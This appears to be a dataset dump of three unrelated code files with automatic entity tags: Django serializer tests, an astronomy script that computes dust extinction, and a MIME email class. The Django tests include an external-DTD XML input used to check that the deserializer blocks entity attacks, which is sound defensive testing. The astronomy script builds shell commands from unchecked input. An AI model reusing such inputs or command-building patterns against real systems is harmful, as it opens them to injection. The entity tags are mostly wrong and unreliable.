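# data_compare(self, 10, CharData, "Test Char Data") to assert equality.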
test_data = [
# Format: (data type, PK value, Model Class, data)
(data_obj, 1, BinaryData, six.memoryview(b"\x05\xFD\x00")),
(data_obj, 2, BinaryData, None),
(data_obj, 5, BooleanData, True),
(data_obj, 6, BooleanData, False),
(data_obj, 10, CharData, "Test Char Data"),
(data_obj, 11, CharData, ""),
(data_obj, 12, CharData, "None"),
(data_obj, 13, CharData, "null"),
(data_obj, 14, CharData, "NULL"),
(data_obj, 15, CharData, None),
# (We use something that will fit into a latin1 database encoding here,
# because that is still the default used on many system setups.)
(data_obj, 16, CharData, '\xa5'),
(data_obj, 20, DateData, datetime.date(2006,6,16)),
(data_obj, 21, DateData, None),
(data_obj, 30, DateTimeData, datetime.datetime(2006,6,16,10,42,37)),
(data_obj, 31, DateTimeData, None),
    (data_obj, 40, EmailData, "dummy@email.com"),
(data_obj, 41, EmailData, None),
(data_obj, 42, EmailData, ""),
(data_obj, 50, FileData, 'file:///foo/bar/whiz.txt'),
# (data_obj, 51, FileData, None),
(data_obj, 52, FileData, ""),
(data_obj, 60, FilePathData, "/foo/bar/whiz.txt"),
(data_obj, 61, FilePathData, None),
(data_obj, 62, FilePathData, ""),
(data_obj, 70, DecimalData, decimal.Decimal('12.345')),
(data_obj, 71, DecimalData, decimal.Decimal('-12.345')),
(data_obj, 72, DecimalData, decimal.Decimal('0.0')),
(data_obj, 73, DecimalData, None),
(data_obj, 74, FloatData, 12.345),
(data_obj, 75, FloatData, -12.345),
(data_obj, 76, FloatData, 0.0),
(data_obj, 77, FloatData, None),
(data_obj, 80, IntegerData, 123456789),
(data_obj, 81, IntegerData, -123456789),
(data_obj, 82, IntegerData, 0),
(data_obj, 83, IntegerData, None),
#(XX, ImageData
(data_obj, 90, IPAddressData, "127.0.0.1"),
(data_obj, 91, IPAddressData, None),
(data_obj, 95, GenericIPAddressData, "127.0.0.1"),
(data_obj, 96, GenericIPAddressData, None),
(data_obj, 100, NullBooleanData, True),
(data_obj, 101, NullBooleanData, False),
(data_obj, 102, NullBooleanData, None),
(data_obj, 120, PositiveIntegerData, 123456789),
(data_obj, 121, PositiveIntegerData, None),
(data_obj, 130, PositiveSmallIntegerData, 12),
(data_obj, 131, PositiveSmallIntegerData, None),
(data_obj, 140, SlugData, "this-is-a-slug"),
(data_obj, 141, SlugData, None),
(data_obj, 142, SlugData, ""),
(data_obj, 150, SmallData, 12),
(data_obj, 151, SmallData, -12),
(data_obj, 152, SmallData, 0),
(data_obj, 153, SmallData, None),
(data_obj, 160, TextData, """This is a long piece of text.
It contains line breaks.
Several of them.
The end."""),
(data_obj, 161, TextData, ""),
(data_obj, 162, TextData, None),
(data_obj, 170, TimeData, datetime.time(10,42,37)),
(data_obj, 171, TimeData, None),
(generic_obj, 200, GenericData, ['Generic Object 1', 'tag1', 'tag2']),
(generic_obj, 201, GenericData, ['Generic Object 2', 'tag2', 'tag3']),
(data_obj, 300, Anchor, "Anchor 1"),
(data_obj, 301, Anchor, "Anchor 2"),
(data_obj, 302, UniqueAnchor, "UAnchor 1"),
(fk_obj, 400, FKData, 300), # Post reference
(fk_obj, 401, FKData, 500), # Pre reference
(fk_obj, 402, FKData, None), # Empty reference
(m2m_obj, 410, M2MData, []), # Empty set
(m2m_obj, 411, M2MData, [300,301]), # Post reference
(m2m_obj, 412, M2MData, [500,501]), # Pre reference
(m2m_obj, 413, M2MData, [300,301,500,501]), # Pre and Post reference
(o2o_obj, None, O2OData, 300), # Post reference
(o2o_obj, None, O2OData, 500), # Pre reference
(fk_obj, 430, FKSelfData, 431), # Pre reference
(fk_obj, 431, FKSelfData, 430), # Post reference
(fk_obj, 432, FKSelfData, None), # Empty reference
(m2m_obj, 440, M2MSelfData, []),
(m2m_obj, 441, M2MSelfData, []),
(m2m_obj, 442, M2MSelfData, [440, 441]),
(m2m_obj, 443, M2MSelfData, [445, 446]),
(m2m_obj, 444, M2MSelfData, [440, 441, 445, 446]),
(m2m_obj, 445, M2MSelfData, []),
(m2m_obj, 446, M2MSelfData, []),
(fk_obj, 450, FKDataToField, "UAnchor 1"),
(fk_obj, 451, FKDataToField, "UAnchor 2"),
(fk_obj, 452, FKDataToField, None),
(fk_obj, 460, FKDataToO2O, 300),
(im2m_obj, 470, M2MIntermediateData, None),
#testing post- and prereferences and extra fields
(im_obj, 480, Intermediate, {'right': 300, 'left': 470}),
(im_obj, 481, Intermediate, {'right': 300, 'left': 490}),
(im_obj, 482, Intermediate, {'right': 500, 'left': 470}),
(im_obj, 483, Intermediate, {'right': 500, 'left': 490}),
(im_obj, 484, Intermediate, {'right': 300, 'left': 470, 'extra': "extra"}),
(im_obj, 485, Intermediate, {'right': 300, 'left': 490, 'extra': "extra"}),
(im_obj, 486, Intermediate, {'right': 500, 'left': 470, 'extra': "extra"}),
(im_obj, 487, Intermediate, {'right': 500, 'left': 490, 'extra': "extra"}),
(im2m_obj, 490, M2MIntermediateData, []),
(data_obj, 500, Anchor, "Anchor 3"),
(data_obj, 501, Anchor, "Anchor 4"),
(data_obj, 502, UniqueAnchor, "UAnchor 2"),
(pk_obj, 601, BooleanPKData, True),
(pk_obj, 602, BooleanPKData, False),
(pk_obj, 610, CharPKData, "Test Char PKData"),
# (pk_obj, 620, DatePKData, datetime.date(2006,6,16)),
# (pk_obj, 630, DateTimePKData, datetime.datetime(2006,6,16,10,42,37)),
    (pk_obj, 640, EmailPKData, "dummy@email.com"),
# (pk_obj, 650, FilePKData, 'file:///foo/bar/whiz.txt'),
(pk_obj, 660, FilePathPKData, "/foo/bar/whiz.txt"),
(pk_obj, 670, DecimalPKData, decimal.Decimal('12.345')),
(pk_obj, 671, DecimalPKData, decimal.Decimal('-12.345')),
(pk_obj, 672, DecimalPKData, decimal.Decimal('0.0')),
(pk_obj, 673, FloatPKData, 12.345),
(pk_obj, 674, FloatPKData, -12.345),
(pk_obj, 675, FloatPKData, 0.0),
(pk_obj, 680, IntegerPKData, 123456789),
(pk_obj, 681, IntegerPKData, -123456789),
(pk_obj, 682, IntegerPKData, 0),
# (XX, ImagePKData
(pk_obj, 690, IPAddressPKData, "127.0.0.1"),
(pk_obj, 695, GenericIPAddressPKData, "127.0.0.1"),
# (pk_obj, 700, NullBooleanPKData, True),
# (pk_obj, 701, NullBooleanPKData, False),
(pk_obj, 720, PositiveIntegerPKData, 123456789),
(pk_obj, 730, PositiveSmallIntegerPKData, 12),
(pk_obj, 740, SlugPKData, "this-is-a-slug"),
(pk_obj, 750, SmallPKData, 12),
(pk_obj, 751, SmallPKData, -12),
(pk_obj, 752, SmallPKData, 0),
# (pk_obj, 760, TextPKData, """This is a long piece of text.
# It contains line breaks.
# Several of them.
# The end."""),
# (pk_obj, 770, TimePKData, datetime.time(10,42,37)),
# (pk_obj, 790, XMLPKData, "<foo></foo>"),
(data_obj, 800, AutoNowDateTimeData, datetime.datetime(2006,6,16,10,42,37)),
(data_obj, 810, ModifyingSaveData, 42),
(inherited_obj, 900, InheritAbstractModel, {'child_data':37,'parent_data':42}),
(inherited_obj, 910, ExplicitInheritBaseModel, {'child_data':37,'parent_data':42}),
(inherited_obj, 920, InheritBaseModel, {'child_data':37,'parent_data':42}),
(data_obj, 1000, BigIntegerData, 9223372036854775807),
(data_obj, 1001, BigIntegerData, -9223372036854775808),
(data_obj, 1002, BigIntegerData, 0),
(data_obj, 1003, BigIntegerData, None),
(data_obj, 1004, LengthModel, 0),
(data_obj, 1005, LengthModel, 1),
]
natural_key_test_data = [
    (data_obj, 1100, NaturalKeyAnchor, "Natural Key Anchor"),
(fk_obj, 1101, FKDataNaturalKey, 1100),
(fk_obj, 1102, FKDataNaturalKey, None),
]
# Because Oracle treats the empty string as NULL, Oracle is expected to fail
# when field.empty_strings_allowed is True and the value is None; skip these
# tests.
if connection.features.interprets_empty_strings_as_nulls:
test_data = [data for data in test_data
if not (data[0] == data_obj and
data[2]._meta.get_field('data').empty_strings_allowed and
data[3] is None)]
# Regression test for #8651 -- a FK to an object with PK of 0.
# This won't work on MySQL, since it won't let you create an object
# with a primary key of 0.
if connection.features.allows_primary_key_0:
test_data.extend([
(data_obj, 0, Anchor, "Anchor 0"),
(fk_obj, 465, FKData, 0),
])
# Dynamically create serializer tests to ensure that all
# registered serializers are automatically tested.
class SerializerTests(TestCase):
def test_get_unknown_serializer(self):
"""
#15889: get_serializer('nonsense') raises a SerializerDoesNotExist
"""
with self.assertRaises(SerializerDoesNotExist):
serializers.get_serializer("nonsense")
with self.assertRaises(KeyError):
serializers.get_serializer("nonsense")
# SerializerDoesNotExist is instantiated with the nonexistent format
with self.assertRaises(SerializerDoesNotExist) as cm:
serializers.get_serializer("nonsense")
self.assertEqual(cm.exception.args, ("nonsense",))
    def test_unregister_unknown_serializer(self):
with self.assertRaises(SerializerDoesNotExist):
serializers.unregister_serializer("nonsense")
    def test_get_unknown_deserializer(self):
with self.assertRaises(SerializerDoesNotExist):
serializers.get_deserializer("nonsense")
def test_json_deserializer_exception(self):
with self.assertRaises(DeserializationError):
for obj in serializers.deserialize("json", """[{"pk":1}"""):
pass
@skipUnless(yaml, "PyYAML not installed")
def test_yaml_deserializer_exception(self):
with self.assertRaises(DeserializationError):
for obj in serializers.deserialize("yaml", "{"):
pass
def test_serialize_proxy_model(self):
BaseModel.objects.create(parent_data=1)
base_objects = BaseModel.objects.all()
proxy_objects = ProxyBaseModel.objects.all()
proxy_proxy_objects = ProxyProxyBaseModel.objects.all()
base_data = serializers.serialize("json", base_objects)
proxy_data = serializers.serialize("json", proxy_objects)
proxy_proxy_data = serializers.serialize("json", proxy_proxy_objects)
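        # The proxy rows serialize under the proxy model's label (e.g.
        # "...proxybasemodel"), so stripping the substring 'proxy' should make
        # the output byte-identical to the concrete base model's serialization.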
self.assertEqual(base_data, proxy_data.replace('proxy', ''))
self.assertEqual(base_data, proxy_proxy_data.replace('proxy', ''))
def serializerTest(format, self):
# Create all the objects defined in the test data
objects = []
instance_count = {}
for (func, pk, klass, datum) in test_data:
with connection.constraint_checks_disabled():
objects.extend(func[0](pk, klass, datum))
# Get a count of the number of objects created for each class
    for (func, pk, klass, datum) in test_data:
        instance_count[klass] = klass.objects.count()
# Add the generic tagged objects to the object list
objects.extend(Tag.objects.all())
# Serialize the test database
serialized_data = serializers.serialize(format, objects, indent=2)
for obj in serializers.deserialize(format, serialized_data):
obj.save()
# Assert that the deserialized data is the same
# as the original source
for (func, pk, klass, datum) in test_data:
func[1](self, pk, klass, datum)
# Assert that the number of objects deserialized is the
# same as the number that was serialized.
for klass, count in instance_count.items():
self.assertEqual(count, klass.objects.count())
if connection.vendor == 'mysql' and six.PY3:
# Existing MySQL DB-API drivers fail on binary data.
serializerTest = expectedFailure(serializerTest)
def naturalKeySerializerTest(format, self):
# Create all the objects defined in the test data
objects = []
instance_count = {}
for (func, pk, klass, datum) in natural_key_test_data:
with connection.constraint_checks_disabled():
objects.extend(func[0](pk, klass, datum))
# Get a count of the number of objects created for each class
    for (func, pk, klass, datum) in natural_key_test_data:
        instance_count[klass] = klass.objects.count()
# Serialize the test database
serialized_data = serializers.serialize(format, objects, indent=2,
use_natural_keys=True)
for obj in serializers.deserialize(format, serialized_data):
obj.save()
# Assert that the deserialized data is the same
# as the original source
for (func, pk, klass, datum) in natural_key_test_data:
func[1](self, pk, klass, datum)
# Assert that the number of objects deserialized is the
# same as the number that was serialized.
for klass, count in instance_count.items():
self.assertEqual(count, klass.objects.count())
def fieldsTest(format, self):
obj = ComplexModel(field1='first', field2='second', field3='third')
obj.save_base(raw=True)
# Serialize then deserialize the test database
serialized_data = serializers.serialize(format, [obj], indent=2, fields=('field1','field3'))
result = next(serializers.deserialize(format, serialized_data))
# Check that the deserialized object contains data in only the serialized fields.
self.assertEqual(result.object.field1, 'first')
self.assertEqual(result.object.field2, '')
self.assertEqual(result.object.field3, 'third')
def streamTest(format, self):
obj = ComplexModel(field1='first',field2='second',field3='third')
obj.save_base(raw=True)
# Serialize the test database to a stream
for stream in (six.StringIO(), HttpResponse()):
serializers.serialize(format, [obj], indent=2, stream=stream)
# Serialize normally for a comparison
string_data = serializers.serialize(format, [obj], indent=2)
# Check that the two are the same
if isinstance(stream, six.StringIO):
self.assertEqual(string_data, stream.getvalue())
else:
self.assertEqual(string_data, stream.content.decode('utf-8'))
for format in serializers.get_serializer_formats():
setattr(SerializerTests, 'test_' + format + '_serializer', curry(serializerTest, format))
setattr(SerializerTests, 'test_' + format + '_natural_key_serializer', curry(naturalKeySerializerTest, format))
setattr(SerializerTests, 'test_' + format + '_serializer_fields', curry(fieldsTest, format))
if format != 'python':
setattr(SerializerTests, 'test_' + format + '_serializer_stream', curry(streamTest, format))
class XmlDeserializerSecurityTests(TestCase):
def test_no_dtd(self):
"""
The XML deserializer shouldn't allow a DTD.
This is the most straightforward way to prevent all entity definitions
and avoid both external entities and entity-expansion attacks.
"""
xml = '<?xml version="1.0" standalone="no"?><!DOCTYPE example SYSTEM "http://example.com/example.dtd">'
with self.assertRaises(DTDForbidden):
next(serializers.deserialize('xml', xml))
| 21,669 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['NRP', 'django.core'], ['PERSON', 'DTDForbidden'], ['LOCATION', 'DecimalData'], ['LOCATION', 'FKData'], ['LOCATION', 'ProxyBaseModel'], ['PERSON', "data['right"], ['NRP', "data['extra"], ['PERSON', 'type(instance.data'], ['PERSON', 'type(instance.data'], ['LOCATION', 'generic_compare(testcase'], ['LOCATION', 'fk_compare(testcase'], ['LOCATION', 'o2o_compare(testcase'], ['LOCATION', 'pk_compare(testcase'], ['PERSON', 'm2m_obj'], ['LOCATION', 'inherited_obj'], ['PERSON', '\\xa5'], ['DATE_TIME', '20'], ['DATE_TIME', '21'], ['DATE_TIME', '30'], ['DATE_TIME', '31'], ['DATE_TIME', '40'], ['DATE_TIME', '41'], ['DATE_TIME', '42'], ['DATE_TIME', '50'], ['DATE_TIME', '51'], ['DATE_TIME', '52'], ['DATE_TIME', '60'], ['DATE_TIME', '61'], ['DATE_TIME', '62'], ['DATE_TIME', '70'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '71'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '72'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '73'], ['LOCATION', 'DecimalData'], ['DATE_TIME', '74'], ['DATE_TIME', '75'], ['DATE_TIME', '76'], ['DATE_TIME', '77'], ['DATE_TIME', '80'], ['DATE_TIME', '123456789'], ['DATE_TIME', '81'], ['DATE_TIME', '82'], ['DATE_TIME', '83'], ['DATE_TIME', '90'], ['DATE_TIME', '91'], ['DATE_TIME', '95'], ['DATE_TIME', '96'], ['DATE_TIME', '101'], ['NRP', 'SlugData'], ['NRP', 'SlugData'], ['NRP', 'SlugData'], ['PERSON', 'tag3'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '410'], ['LOCATION', 'm2m_obj'], ['LOCATION', 'm2m_obj'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '440'], ['LOCATION', 'm2m_obj'], ['LOCATION', '441'], ['LOCATION', 'm2m_obj'], ['DATE_TIME', '443'], ['LOCATION', 'm2m_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['NRP', 'im_obj'], ['LOCATION', 'DecimalPKData'], ['LOCATION', 'DecimalPKData'], ['LOCATION', 'DecimalPKData'], ['DATE_TIME', '123456789'], ['LOCATION', '751'], ['NRP', 'inherited_obj'], ['NRP', 'inherited_obj'], ['NRP', 'inherited_obj'], ['DATE_TIME', '1100'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['NRP', 'Serialize'], ['LOCATION', 'indent=2'], ['PERSON', "next(serializers.deserialize('xml"], ['URL', 'http://example.com/example.dtd"'], ['URL', 'django.co'], ['URL', 'django.core.se'], ['URL', 'django.core.serializers.ba'], ['URL', 'django.core.se'], ['URL', 'django.ht'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'instance.tags.cr'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'models.Model.sa'], ['URL', 'meta.parents.it'], ['URL', 'klass.objects.ge'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'obj.id'], ['URL', 'klass.objects.ge'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'testcase.as'], ['URL', 'klass.objects.ge'], ['URL', 'data.it'], ['URL', 'testcase.as'], ['URL', 'six.me'], ['URL', 
'email.com'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'email.com'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'decimal.De'], ['URL', 'connection.features.int'], ['URL', 'meta.ge'], ['URL', 'connection.features.al'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'cm.exception.ar'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.de'], ['URL', 'self.as'], ['URL', 'serializers.de'], ['URL', 'BaseModel.objects.cr'], ['URL', 'BaseModel.objects.al'], ['URL', 'ProxyBaseModel.objects.al'], ['URL', 'ProxyProxyBaseModel.objects.al'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'self.as'], ['URL', 'data.re'], ['URL', 'self.as'], ['URL', 'data.re'], ['URL', 'connection.co'], ['URL', 'klass.objects.co'], ['URL', 'Tag.objects.al'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'obj.sa'], ['URL', 'count.it'], ['URL', 'self.as'], ['URL', 'klass.objects.co'], ['URL', 'connection.ve'], ['URL', 'six.PY'], ['URL', 'connection.co'], ['URL', 'klass.objects.co'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'obj.sa'], ['URL', 'count.it'], ['URL', 'self.as'], ['URL', 'klass.objects.co'], ['URL', 'obj.sa'], ['URL', 'serializers.se'], ['URL', 'serializers.de'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'self.as'], ['URL', 'result.object.fi'], ['URL', 'obj.sa'], ['URL', 'six.St'], ['URL', 'serializers.se'], ['URL', 'serializers.se'], ['URL', 'six.St'], ['URL', 'self.as'], ['URL', 'stream.ge'], ['URL', 'self.as'], ['URL', 'stream.content.de'], ['URL', 'serializers.ge'], ['URL', 'self.as'], ['URL', 'serializers.de']] |
43 | import threading
def ebv_list(list_submit,list_dict,i,ppid):
import os
lineindex = 0
timehold = time.time()
list_out = []
out = open('/tmp/tmpf_' + str(i) + '_' + str(ppid),'w')
for line in list_submit:
tt = re.split('\s+',line)
ra = float(tt[0])
dec = float(tt[1])
EBV = calc_EBV(float(ra),float(dec),i)
list_out.append(EBV)
#print EBV
lineindex += 1
out.write(str(EBV) + '\n')
if lineindex % 100 == 0:
print 'thread ' + str(i), lineindex, len(list_submit), time.time() - timehold
timehold = time.time()
list_dict[str(i)]['list_out'] = list_out
out.close()
def calc_EBV(coord_in_ra,coord_in_dec,i):
#coord_in_ra='12:51:26.28'
#coord_in_dec='27:07:42.'
coord = Equatorial( str(coord_in_ra*(24./360.)), str(coord_in_dec), epoch='2000') # input needs to be in HOURS as a STRING
g = Galactic(coord, epoch='2000') # output is in degrees not hours--it's latitude/longitude
spt = re.split('\:',str(g.lat))
#print spt, abs(float(spt[0])), float(spt[1])/60.
gallat = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallat
#print g.long
spt = re.split('\:',str(g.long))
#print spt
gallong = float(spt[0]) / abs(float(spt[0])) * (abs(float(spt[0])) + float(spt[1])/60. + float(spt[2])/3600. )
#print gallong
#coordtest = Equatorial(Galactic(g.long,g.lat, epoch='2000'), epoch='2000')
output = commands.getoutput('dust_getval ' + str(gallong) + ' ' + str(gallat) + ' interp=y PI:KEY' + str(i) )
spt = re.split('\s',output)
#print spt
EBV = spt[-1]
#print EBV, float(coord_in_ra), float(coord_in_dec)
return EBV
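# Example (hypothetical coordinates): calc_EBV(187.25, 2.05, 0) converts the
# equatorial position to galactic (l, b) via pyephem, shells out to the SFD
# 'dust_getval' utility, and returns the interpolated E(B-V) as a string.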
# Thread-based worker variant (unused below; the script forks worker
# processes instead).
class MyThread(threading.Thread):
def __init__ ( self, list_submit,list_dict, i, ppid):
self.i = i
self.list_submit = list_submit
self.list_dict = list_dict
self.ppid = ppid
threading.Thread.__init__(self)
def run ( self ):
ebv_list(self.list_submit,list_dict,self.i,self.ppid)
return
#add E(B-V) to ldac table
import re, commands, sys, bashreader, os
from ephem import *
dict = bashreader.parseFile('progs.ini')
table = sys.argv[1]
import time
tempfile = '/tmp/outkey'
ebvfile = '/tmp/outebv'
os.system('rm ' + ebvfile)
ppid = os.getppid()
print ppid
command = "ldactoasc -b -i " + table + " -t OBJECTS -k ALPHA_J2000 DELTA_J2000 > " + ebvfile
print command
os.system(command)
list = []
import re
outkey=open(tempfile,'w')
lines = open(ebvfile,'r').readlines()
number_interval = 4
length_int = len(lines)/number_interval
start = 0
my_threads = []
list_dict = {}
for i in range(number_interval):
end = start + length_int
if i + 1 == number_interval:
list_submit = lines[start:]
else:
list_submit = lines[start:end]
start = end
list_dict[str(i)] = {'list_submit':list_submit}
#s = MyThread(list_submit,list_dict,i,ppid)
#stat = os.fork()
print i, 'started'
s = os.fork()
if not s:
ebv_list(list_submit,list_dict,i,ppid)
sys.exit()
#s.start()
my_threads.append(s)
print my_threads
#print threading.enumerate()
for s in my_threads:
os.waitpid(s,0)
print 'done'
list_out = []
for i in range(number_interval):
    # os.fork() gives each child its own copy of list_dict, so the parent never
    # sees the children's 'list_out' entries; read back the per-child temp
    # files written in ebv_list() instead.
    with open('/tmp/tmpf_' + str(i) + '_' + str(ppid)) as f:
        list_out = list_out + [l.strip() for l in f.readlines()]
print len(lines), len(list_out)
print lines[0:2], list_out[0:2]
# READ IN COLUMN INFO
for val in list_out:
outkey.write(str(val) + '\n')
outkey.close()
command = "asctoldac -i " + tempfile + " -o " + tempfile + ".cat -c " + dict['photconf'] + "/EBV.conf -t OBJECTS "
os.system(command)
command = "ldacjoinkey -o test -i " + table + " -p " + tempfile + ".cat -t OBJECTS -k EBV"
os.system(command)
| 3,755 | [['PERSON', 'timehold'], ['PERSON', 'ra = float(tt[0'], ['PERSON', 'timehold'], ['LOCATION', 'Equatorial'], ['PERSON', 'gallat'], ['PERSON', 'gallong = float(spt[0'], ['PERSON', 'MyThread'], ['PERSON', 'self.list_dict = list_dict'], ['LOCATION', 'self.i'], ['URL', 'out.cl'], ['URL', 'g.la'], ['URL', 'g.la'], ['URL', 'commands.ge'], ['URL', 'threading.Th'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'threading.Th'], ['URL', 'self.li'], ['URL', 'bashreader.pa'], ['URL', 'progs.in'], ['URL', 'sys.ar'], ['URL', 'os.sy'], ['URL', 'os.ge'], ['URL', 'os.sy'], ['URL', 'os.fo'], ['URL', 'os.fo'], ['URL', 's.st'], ['URL', 'outkey.cl'], ['URL', 'EBV.co'], ['URL', 'os.sy'], ['URL', 'os.sy']] |
44 | #coding=utf-8
import smtplib
from datetime import datetime
from hashlib import md5
import sys, re
import random  # used by gen_message_id()
from .misc import *
from .parts import *
from collections import OrderedDict as odict
class Mimemail():
def __init__(self, **kwargs):
self.headers = odict()
self.headers['MIME-Version'] = '1.0'
self.headers['From'] = MM_DEFAULT_FROM
self.headers['Date'] = datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
self.body = ''
self.html = None
self.text = None
self.images = []
self.attachments = []
self.charset = 'UTF-8'
self.recipients = {}
self.from_email = 'root@localhost'
self.kw = kwargs
def set_from(self, from_email, from_name):
self.headers['From'] = '%s <%s>' % (encode_header(from_name, self.charset), from_email)
self.from_email = from_email
def set_html(self, html):
self.html = html
def set_text(self, text):
self.text = text
def add_image(self, image):
self.images.append(image)
def add_attachment(self, att):
self.attachments.append(att)
def set_subject(self, subject):
self.subject = subject
def create_images_part(self, boundary):
lines = []
for image in self.images:
lines.extend([
MM_DEFAULT_CRLF,
'--%s%s' % (boundary, MM_DEFAULT_CRLF),
image.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
image.get_part_body()
])
return ''.join(lines)
def create_attachments_part(self, boundary):
lines = []
for att in self.attachments:
lines.extend([
MM_DEFAULT_CRLF,
'--%s%s' % (boundary, MM_DEFAULT_CRLF),
att.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
att.get_part_body()
])
return ''.join(lines)
def build(self):
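        # MIME layout assembled below (standard nesting, noted for clarity):
        #   multipart/mixed           <- only when attachments are present
        #     multipart/related       <- only when inline images are present
        #       multipart/alternative <- always: the text and html parts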
has_html = self.html != None
has_text = self.text != None
has_img = len(self.images) > 0
has_att = len(self.attachments) > 0
if has_text and not has_html:
            # flags must be passed by keyword: positionally, the fourth
            # argument of re.sub() is 'count', which would silently swallow
            # re.M | re.S.
            self.html = MimemailPartHtml(re.sub(r'\n', '<br>', self.text.plain_content, flags=re.M | re.S), charset = self.charset)
        elif has_html and not has_text:
            self.text = MimemailPartText(re.sub(r'<|>|/', '', self.html.plain_content, flags=re.M | re.S | re.U), charset = self.charset)
elif not has_html and not has_text and not has_att:
raise MimemailException('An email has no content to send')
if has_img:
for image in self.images:
src = image.get_file_path()
dst = 'cid:' + image.get_image_cid()
self.html.plain_content = self.html.plain_content.replace(os.path.basename(src), dst)
boundary = 'alt_' + gen_boundary_hash()
self.headers['Content-Type'] = 'multipart/alternative; boundary="' + boundary + '"'
self.body = ''.join([
'--%s%s' % ( boundary, MM_DEFAULT_CRLF ),
self.text.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
self.text.get_part_body(),
'%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF ),
self.html.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
self.html.get_part_body(),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
if has_img:
boundary = 'rel_' + gen_boundary_hash()
self.body = ''.join([
'--%s%s' % ( boundary, MM_DEFAULT_CRLF ),
'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),
self.body,
self.create_images_part(boundary),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
self.headers['Content-Type'] = 'multipart/related; boundary="%s"' % (boundary)
if has_att:
boundary = 'att_' + gen_boundary_hash()
self.body = ''.join([
'--%s%s' % (boundary, MM_DEFAULT_CRLF ),
'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),
self.body,
self.create_attachments_part(boundary),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
self.headers['Content-Type'] = 'multipart/mixed; boundary="%s"' % (boundary)
self.headers['Message-ID'] = self.gen_message_id()
if hasattr(self, 'subject'):
self.headers['Subject'] = encode_header(self.subject, self.charset)
def gen_message_id(self):
        # 'datetime' is the class imported at the top of the module
        # (from datetime import datetime), so call now() on it directly.
        return '<%s.%08x@%s>' % (datetime.now().strftime('%Y%m%d%H%M%S'), random.randint(0, sys.maxint), self.kw.get('host', 'localhost'))
def add_recipient(self, email, name = None):
self.recipients[email] = name if name else email
def send(self):
self.build()
extra_headers = self.get_extra_headers()
for email, name in self.recipients.iteritems():
message = '%s%sTo: %s <%s>%s%s%s' % (extra_headers, MM_DEFAULT_CRLF, encode_header(name, self.charset), email, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF, self.body)
s = smtplib.SMTP(self.kw.get('smtp_relay', '127.0.0.1'))
s.sendmail(self.from_email, email, message)
s.quit()
def get_extra_headers(self):
return MM_DEFAULT_CRLF.join([ '%s: %s' % (k, v) for k,v in self.headers.iteritems() ])
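
# Minimal usage sketch (the addresses and host below are hypothetical; the
# part classes and MM_DEFAULT_* constants come from the .parts/.misc imports):
#   mail = Mimemail(smtp_relay='127.0.0.1', host='example.com')
#   mail.set_from('noreply@example.com', 'Example Sender')
#   mail.set_subject('Greetings')
#   mail.set_html('<b>Hello!</b>')
#   mail.add_recipient('user@example.com')
#   mail.send()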
